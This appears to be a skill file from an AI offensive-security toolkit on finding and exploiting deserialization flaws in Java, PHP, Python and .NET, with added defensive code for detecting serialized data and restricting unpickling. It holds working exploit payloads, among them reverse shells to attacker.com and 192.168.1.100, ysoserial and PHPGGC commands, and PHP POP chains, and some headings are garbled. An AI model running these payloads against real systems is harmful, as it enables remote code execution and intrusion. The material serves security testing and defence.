deserialization-testing
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill deserialization-testing
Skill documentation
Deserialization Vulnerability Testing
Overview
A deserialization vulnerability arises when an application deserializes untrusted data; the impact can include remote code execution and denial of service. This skill covers how to detect, exploit and defend against deserialization vulnerabilities.
How the vulnerability works
When an application deserializes serialized data back into objects and that data comes from an untrusted source, an attacker can craft malicious serialized data that executes arbitrary code during deserialization.
Common formats
Java
Common libraries:
- Java native serialization
- Jackson
- Fastjson
- XStream
- Apache Commons Collections
PHP
Common functions:
- unserialize()
- json_decode()
Python
Common modules:
- pickle
- yaml
- json
.NET
Common classes:
- BinaryFormatter
- SoapFormatter
- DataContractSerializer
Testing methods
1. Identify serialized data
Java serialization signatures:
AC ED 00 05 (hex)
rO0 (Base64)
PHP serialization signatures:
O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}
Python pickle signature:
\x80\x03
2. æ£æµååºååç¹
常è§ä½ç½®ï¼
- Cookieå¼
- Sessionæ°æ®
- APIåæ°
- æä»¶ä¸ä¼
- ç¼åæ°æ®
- æ¶æ¯éå
3. Javaååºåå
Apache Commons Collectionså©ç¨ï¼
// 使ç¨ysoserialçæPayload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
Common gadget chains:
- CommonsCollections1-7
- Spring1-2
- ROME
- Jdk7u21
4. PHP deserialization
Basic test:
<?php
class Test {
    public $cmd = "id";
    function __destruct() {
        system($this->cmd);
    }
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>
Magic methods used for exploitation:
- __destruct()
- __wakeup()
- __toString()
- __call()
5. Python pickle
Basic test:
import pickle
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('id',))

pickle.dumps(RCE())
Exploitation techniques
Java RCE
With ysoserial:
# Generate the payload
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
# Base64-encode it
base64 -w 0 payload.bin
Manual construction:
// Build the malicious object from a gadget chain
// See the ysoserial source for reference
PHP RCE
Using a POP chain:
<?php
class A {
    public $b;
    function __destruct() {
        $this->b->test();
    }
}
class B {
    public $c;
    function test() {
        call_user_func($this->c, "id");
    }
}
$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>
Python RCE
Pickle RCE:
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))
Bypass techniques
Encoding bypass
Base64 encoding:
Original: rO0ABXNy...
Encoded: ck8wQUJYTnk...
URL encoding:
%72%4F%00%AB...
Filter bypass
Use a different gadget chain:
- If CommonsCollections is filtered, try Spring
- If one version is filtered, try another version
Type confusion
Using reflection:
Class.forName("java.lang.Runtime").getMethod("exec", String.class)
Tool usage
ysoserial
# List available gadgets
java -jar ysoserial.jar
# Generate a payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
# Generate Base64 output
java -jar ysoserial.jar CommonsCollections1 "command" | base64
PHPGGC
# List available gadgets
./phpggc -l
# Generate a payload
./phpggc Monolog/RCE1 system id
# Generate an encoded payload
./phpggc -b Monolog/RCE1 system id
Burp Suite
- Intercept requests that carry serialized data
- Generate payloads with a plugin
- Replace the original data
- Observe the response
Verification and reporting
Verification steps
- Confirm that the serialized data can be controlled
- Verify that deserialization triggers code execution
- Assess the impact (RCE, data leakage, etc.)
- Record a complete PoC
Report essentials
- Vulnerability location and serialized data format
- Gadget chain or exploitation method used
- Complete exploitation steps and PoC
- Remediation advice (input validation, safe serialization formats, etc.)
Defensive measures
Recommended approach
- Avoid deserializing untrusted data
  - Use JSON instead
  - Use a safe serialization format
- Input validation
  // Whitelist the class names that may be deserialized
  private static final Set<String> ALLOWED_CLASSES = Set.of("com.example.SafeClass");
  private Object readObject(ObjectInputStream ois) {
      // Validate the class name against ALLOWED_CLASSES
      // ...
  }
- Use a safe configuration
  // Jackson configuration: polymorphic default typing is what lets the input choose the class,
  // so it must stay off (enableDefaultTyping() is the unsafe, deprecated setting)
  objectMapper.deactivateDefaultTyping();
  objectMapper.setVisibility(PropertyAccessor.FIELD, JsonAutoDetect.Visibility.ANY);
- ClassLoader isolation
  - Use a custom ClassLoader
  - Restrict the classes that can be loaded
- Monitoring and logging
  - Log deserialization operations
  - Monitor for anomalous behaviour
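Added example (not part of the original skill or the CyberStrikeAI project) that ties step 1 above to the whitelist idea in the defensive measures: a Python classifier that flags request values carrying Java, PHP or pickle serialized data using the signatures listed on this page, plus a restricted unpickler that refuses any global outside an allowlist. The names classify_serialized, RestrictedUnpickler, safe_loads and the sample values are my own constructions.

```python
import base64
import io
import pickle
import re
# Signatures from the page: Java streams start with AC ED 00 05 ("rO0A" in base64),
# PHP serialize() output with a type letter and length, pickle 2+ with \x80 + protocol.
JAVA_MAGIC = b"\xac\xed\x00\x05"
PHP_RE = re.compile(rb'^(?:[Oa]:\d+:|s:\d+:"|[ibd]:)')
PICKLE_RE = re.compile(rb"^\x80[\x02-\x05]")

def classify_serialized(value):
    """Return 'java', 'php', 'pickle' or None for a raw or base64-encoded request value."""
    views = [value]
    try:
        views.append(base64.b64decode(value, validate=True))
    except ValueError:  # not base64 (binascii.Error subclasses ValueError)
        pass
    for v in views:
        if v.startswith(JAVA_MAGIC):
            return "java"
        if PICKLE_RE.match(v):
            return "pickle"
        if PHP_RE.match(v):
            return "php"
    return None

# Allowlist mitigation for pickle: find_class() runs for every GLOBAL opcode, so a
# __reduce__ aimed at an os function (the page's RCE class) is refused before any call.
ALLOWED_GLOBALS = {("builtins", "set"), ("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_loads(data):
    try:  # (True, obj) or (False, reason); nothing off the allowlist gets called
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)

# Constructed request values (not captured traffic). pickle_probe has the opcode
# shape of the page's RCE class (GLOBAL, EMPTY_TUPLE, REDUCE) aimed at posix.getpid.
SAMPLE_PARAMS = {
    "java_cookie": base64.b64encode(JAVA_MAGIC + b"sr\x00\x0bjava.util.Map"),
    "php_session": b'a:2:{s:4:"test";s:4:"data";}',
    "pickle_cache": pickle.dumps({"user": "alice"}, protocol=3),
    "pickle_probe": b"\x80\x03cposix\ngetpid\n)R.",
}
```

The classifier is a triage aid for proxies and log review, not proof of a vulnerability; the allowlist pattern is the pickle counterpart of the Java class whitelist above.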
Notes
- Only test in authorized test environments
- Gadget chains differ between library versions
- Watch for payload size limits when testing
- Know the dependency versions used by the target application